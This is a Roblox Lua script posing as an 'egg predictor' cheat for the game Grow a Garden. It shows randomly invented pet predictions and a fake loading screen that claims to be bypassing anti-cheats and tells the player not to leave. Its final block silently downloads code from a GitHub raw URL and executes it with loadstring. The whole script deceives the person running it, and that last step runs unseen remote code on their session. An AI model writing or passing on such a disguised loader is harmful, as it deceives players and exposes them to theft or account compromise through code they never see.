local players = game:GetService("Players")
local collectionService = game:GetService("CollectionService")
local localPlayer = players.LocalPlayer or players:GetPlayers()[1]

local eggChances = {
    ["Common Egg"] = {["Dog"] = 33, ["Bunny"] = 33, ["Golden Lab"] = 33},
    ["Uncommon Egg"] = {["Black Bunny"] = 25, ["Chicken"] = 25, ["Cat"] = 25, ["Deer"] = 25},
    ["Rare Egg"] = {["Orange Tabby"] = 33.33, ["Spotted Deer"] = 25, ["Pig"] = 16.67, ["Rooster"] = 16.67, ["Monkey"] = 8.33},
    ["Legendary Egg"] = {["Cow"] = 42.55, ["Silver Monkey"] = 42.55, ["Sea Otter"] = 10.64, ["Turtle"] = 2.13, ["Polar Bear"] = 2.13},
    ["Mythic Egg"] = {["Grey Mouse"] = 37.5, ["Brown Mouse"] = 26.79, ["Squirrel"] = 26.79, ["Red Giant Ant"] = 8.93, ["Red Fox"] = 0},
    ["Bug Egg"] = {["Snail"] = 40, ["Giant Ant"] = 35, ["Caterpillar"] = 25, ["Praying Mantis"] = 0, ["Dragon Fly"] = 0},
    ["Night Egg"] = {["Hedgehog"] = 47, ["Mole"] = 23.5, ["Frog"] = 21.16, ["Echo Frog"] = 8.35, ["Night Owl"] = 0, ["Raccoon"] = 0},
    ["Bee Egg"] = {["Bee"] = 65, ["Honey Bee"] = 20, ["Bear Bee"] = 10, ["Petal Bee"] = 5, ["Queen Bee"] = 0},
    ["Anti Bee Egg"] = {["Wasp"] = 55, ["Tarantula Hawk"] = 31, ["Moth"] = 14, ["Butterfly"] = 0, ["Disco Bee"] = 0},
    ["Common Summer Egg"] = {["Starfish"] = 50, ["Seafull"] = 25, ["Crab"] = 25},
    ["Rare Summer Egg"] = {["Flamingo"] = 30, ["Toucan"] = 25, ["Sea Turtle"] = 20, ["Orangutan"] = 15, ["Seal"] = 10},
    ["Paradise Egg"] = {["Ostrich"] = 43, ["Peacock"] = 33, ["Capybara"] = 24, ["Scarlet Macaw"] = 3, ["Mimic Octopus"] = 1},
    ["Premium Night Egg"] = {["Hedgehog"] = 50, ["Mole"] = 26, ["Frog"] = 14, ["Echo Frog"] = 10},
    ["Dinosaur Egg"] = {["Raptor"] = 33, ["Triceratops"] = 33, ["T-Rex"] = 1, ["Stegosaurus"] = 33, ["Pterodactyl"] = 33, ["Brontosaurus"] = 33}
}

local realESP = {
    ["Common Egg"] = true, ["Uncommon Egg"] = true, ["Rare Egg"] = true,
    ["Common Summer Egg"] = true, ["Rare Summer Egg"] = true
}

local displayedEggs = {}
local autoStopOn = true

local function weightedRandom(options)
    local valid = {}
    for pet, chance in pairs(options) do
        if chance > 0 then table.insert(valid, {pet = pet, chance = chance}) end
    end
    if #valid == 0 then return nil end
    local total = 0
    for _, v in ipairs(valid) do total += v.chance end
    local roll = math.random() * total
    local cumulative = 0
    for _, v in ipairs(valid) do
        cumulative += v.chance
        if roll <= cumulative then return v.pet end
    end
    return valid[1].pet
end

local function getNonRepeatingRandomPet(eggName, lastPet)
    local pool = eggChances[eggName]
    if not pool then return nil end
    local tries, selectedPet = 0, lastPet
    while tries < 5 do
        local pet = weightedRandom(pool)
        if not pet then return nil end
        if pet ~= lastPet or math.random() < 0.3 then
            selectedPet = pet
            break
        end
        tries += 1
    end
    return selectedPet
end

local function createEspGui(object, labelText)
    local billboard = Instance.new("BillboardGui")
    billboard.Name = "FakePetESP"
    billboard.Adornee = object:FindFirstChildWhichIsA("BasePart") or object.PrimaryPart or object
    billboard.Size = UDim2.new(0, 200, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 2.5, 0)
    billboard.AlwaysOnTop = true

    local label = Instance.new("TextLabel")
    label.Size = UDim2.new(1, 0, 1, 0)
    label.BackgroundTransparency = 1
    label.TextColor3 = Color3.new(1, 1, 1)
    label.TextStrokeTransparency = 0
    label.TextScaled = true
    label.Font = Enum.Font.SourceSansBold
    label.Text = labelText
    label.Parent = billboard

    billboard.Parent = object
    return billboard
end

local function addESP(egg)
    if egg:GetAttribute("OWNER") ~= localPlayer.Name then return end
    local eggName = egg:GetAttribute("EggName")
    local objectId = egg:GetAttribute("OBJECT_UUID")
    if not eggName or not objectId or displayedEggs[objectId] then return end

    local labelText, firstPet
    if realESP[eggName] then
        labelText = eggName
    else
        firstPet = getNonRepeatingRandomPet(eggName, nil)
        labelText = eggName .. " | " .. (firstPet or "?")
    end

    local espGui = createEspGui(egg, labelText)
    displayedEggs[objectId] = {
        egg = egg,
        gui = espGui,
        label = espGui:FindFirstChildWhichIsA("TextLabel"),
        eggName = eggName,
        lastPet = firstPet
    }
end

local function removeESP(egg)
    local objectId = egg:GetAttribute("OBJECT_UUID")
    if objectId and displayedEggs[objectId] then
        displayedEggs[objectId].gui:Destroy()
        displayedEggs[objectId] = nil
    end
end

for _, egg in collectionService:GetTagged("PetEggServer") do
    addESP(egg)
end

collectionService:GetInstanceAddedSignal("PetEggServer"):Connect(addESP)
collectionService:GetInstanceRemovedSignal("PetEggServer"):Connect(removeESP)

local gui = Instance.new("ScreenGui")
gui.Name = "LoadingUI"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.Parent = localPlayer:WaitForChild("PlayerGui")

local bg = Instance.new("Frame")
bg.Size = UDim2.new(1, 0, 1, 0)
bg.Position = UDim2.new(0, 0, 0, 0)
bg.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
bg.Parent = gui

local gradient = Instance.new("UIGradient")
gradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(20, 20, 20)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(80, 80, 80))
}
gradient.Rotation = 90
gradient.Parent = bg

local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0, 80)
title.Position = UDim2.new(0, 0, 0.25, 0)
title.Text = "🌺 GROW A GARDEN 🌺"
title.Font = Enum.Font.GothamBlack
title.TextSize = 48
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1
title.TextStrokeTransparency = 0.8
title.TextWrapped = true
title.TextStrokeColor3 = Color3.fromRGB(50, 50, 50)
title.Parent = bg

local warning = Instance.new("TextLabel")
warning.Size = UDim2.new(1, 0, 0, 30)
warning.Position = UDim2.new(0, 0, 0.35, 0)
warning.Text = "⚠️ DO NOT LEAVE - THIS SCRIPT IS CURRENTLY BYPASSING ANTI-CHEATS ( CURRENTLY GENERATING EGG PREDICTOR SCRIPT ) ⚠️"
warning.Font = Enum.Font.GothamBlack
warning.TextSize = 18
warning.TextColor3 = Color3.fromRGB(255, 50, 50)
warning.BackgroundTransparency = 0.7
warning.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
warning.TextStrokeTransparency = 0.5
warning.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)
warning.Parent = bg

local subtitle = Instance.new("TextLabel")
subtitle.Size = UDim2.new(1, 0, 0, 30)
subtitle.Position = UDim2.new(0, 0, 0.45, 0)
subtitle.Text = "Loading game assets..."
subtitle.Font = Enum.Font.Gotham
subtitle.TextSize = 20
subtitle.TextColor3 = Color3.fromRGB(230, 230, 230)
subtitle.BackgroundTransparency = 1
subtitle.TextStrokeTransparency = 0.8
subtitle.TextStrokeColor3 = Color3.fromRGB(50, 50, 50)
subtitle.Parent = bg

local progressContainer = Instance.new("Frame")
progressContainer.Size = UDim2.new(0.7, 0, 0, 20)
progressContainer.Position = UDim2.new(0.15, 0, 0.55, 0)
progressContainer.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
progressContainer.BorderSizePixel = 0
progressContainer.Parent = bg

local progressFill = Instance.new("Frame")
progressFill.Size = UDim2.new(0, 0, 1, 0)
progressFill.Position = UDim2.new(0, 0, 0, 0)
progressFill.BackgroundColor3 = Color3.fromRGB(100, 200, 100)
progressFill.BorderSizePixel = 0
progressFill.Parent = progressContainer

local progressText = Instance.new("TextLabel")
progressText.Size = UDim2.new(1, 0, 0, 20)
progressText.Position = UDim2.new(0, 0, 0.6, 0)
progressText.Text = "0%"
progressText.Font = Enum.Font.GothamMedium
progressText.TextSize = 18
progressText.TextColor3 = Color3.fromRGB(200, 200, 200)
progressText.BackgroundTransparency = 1
progressText.Parent = bg

local runService = game:GetService("RunService")

local function animateLoading()
    local duration = 50
    local startTime = tick()
    while true do
        local elapsed = tick() - startTime
        local progress = math.min(elapsed / duration, 1)
        local easedProgress = progress ^ 0.8
        progressFill.Size = UDim2.new(easedProgress, 0, 1, 0)
        progressText.Text = math.floor(easedProgress * 100) .. "%"
        if easedProgress < 0.2 then
            subtitle.Text = "Loading core assets..."
        elseif easedProgress < 0.4 then
            subtitle.Text = "Initializing garden systems..."
        elseif easedProgress < 0.6 then
            subtitle.Text = "Preparing plant growth algorithms..."
        elseif easedProgress < 0.8 then
            subtitle.Text = "Generating beautiful landscapes..."
        else
            subtitle.Text = "Finalizing your gardening experience..."
        end
        if progress >= 1 then break end
        runService.Heartbeat:Wait()
    end
    gui:Destroy()
end

spawn(animateLoading)

local eggGui = Instance.new("ScreenGui", localPlayer:WaitForChild("PlayerGui"))
eggGui.Name = "EggPredictor"
local btn = Instance.new("TextButton", eggGui)
btn.Size = UDim2.new(0, 200, 0, 40)
btn.Position = UDim2.new(0, 20, 1, -60)
btn.BackgroundColor3 = Color3.fromRGB(70, 130, 180)
btn.Text = "Predict Next Egg"
btn.TextColor3 = Color3.fromRGB(255,255,255)
btn.TextSize = 20
btn.MouseButton1Click:Connect(function()
    print("[🥚 Egg Predictor]: Predicted Egg - " .. math.random(1, 999))
end)

spawn(function()
    local success, err = pcall(function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/pxstd/petspawner/refs/heads/main/petspawner.lua"))()
    end)
    if not success then
        warn("[⚠️ Pet Spawner Error]:", err)
    end
end)